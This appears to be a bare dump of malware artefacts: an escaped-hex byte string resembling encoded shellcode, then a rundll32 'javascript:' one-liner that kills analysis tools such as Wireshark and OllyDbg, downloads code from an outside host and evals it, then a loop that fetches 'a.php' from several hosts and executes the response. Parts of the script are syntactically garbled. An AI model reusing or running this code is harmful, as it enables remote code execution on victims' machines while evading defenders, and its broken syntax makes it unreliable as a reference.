\xbb\xfe\x4a\xa2\xe4\xdb\xc4\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x42\x31\x58\x15\x83\xe8\xfc\x03\x58\x11\xe2\x0b\xb6\x4a\x66\xf3\x47\x8b\x07\x7a\xa2\xba\x07\x18\xa6\xed\xb7\x6b\xea\x01\x33\x39\x1f\x91\x31\x95\x10\x12\xff\xc3\x1f\xa3\xac\x37\x01\x27\xaf\x6b\xe1\x16\x60\x7e\xe0\x5f\x9d\x72\xb0\x08\xe9\x20\x25\x3c\xa7\xf8\xce\x0e\x29\x78\x32\xc6\x48\xa9\xe5\x5c\x13\x69\x07\xb0\x2f\x20\x1f\xd5\x0a\xfb\x94\x2d\xe0\xfa\x7c\x7c\x09\x50\x41\xb0\xf8\xa9\x85\x77\xe3\xdc\xff\x8b\x9e\xe6\x3b\xf1\x44\x63\xd8\x51\x0e\xd3\x04\x63\xc3\x85\xcf\x6f\xa8\xc2\x88\x73\x2f\x07\xa3\x88\xa4\xa6\x64\x19\xfe\x8c\xa0\x41\xa4\xad\xf1\x2f\x0b\xd2\xe2\x8f\xf4\x76\x68\x3d\xe0\x0b\x33\x28\xf7\x9e\x49\x1e\xf7\xa0\x51\x0f\x90\x91\xda\xc0\xe7\x2e\x09\xa5\x18\x65\x10\x8c\xb0\x23\xc0\x8c\xdc\xd4\x3e\xd2\xd8\x56\xcb\xab\x1e\x46\xbe\xae\x5b\xc1\x52\xc3\xf4\xa7\x54\x70\xf4\xe2\x27\x03\x64\x68\xa4\x87\x4b\x42\x1a\x3d\xd4\xc7\x42\xd7\x45\x71\xe2\x54\xe5\x0f\x8d\xea\x9d\xd5\x6f\x57\x70\x07\x2c\x0a\xff\x3f\xb8\xb9\x93\x93\x12\x37\x02\xa3\xc6\xfa\x96\x72\x97\x74\x4b\x1d\x34\x14\xe7\xb4\xd5\xb8\x27\x64\x11\x24\x44\x0d\x17\xd2\xbc\xef\x9f\x7f\xd1\x83\x70\xa0\x7e\x34\xfd\xcc\xe4\xe8\x28\x36\xe5






rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";var%20abcd=new%20ActiveXObject("Wscript.Shell");abcd.run("%windir%\\system32\\cmd.exe /c taskkill /im SysTracerx32.exe /im wireshark.exe /im ollydbg.exe /im hiew32.exe /im pr0c3xp.exe /im httplog.exe /f ");var%20abcde=new%20ActiveXObject("Msxml2.XMLHTTP");abcde.open("GET","http://mividigital.com/counter/?a=0.44955982&i=LZEDdZYqYFppY6hfjbIbGr-45AiL2Mj_fIrO0QjwetZchB98uqOPsG70Gv17kBhSk5jNm9wUQQ",false);abcd.send();if(status==200){eval(abcd.responseText();}




for(var%20i=0;i<5;i++){try{var%20t="http://"+x[i];var%20z=new%20ActiveXObject(y);z.open("GET"),t+"a.php",false);z.send();if(z.status==200){eval(responseText.split(~).join("a"));break;};catch(e){};};


window.close();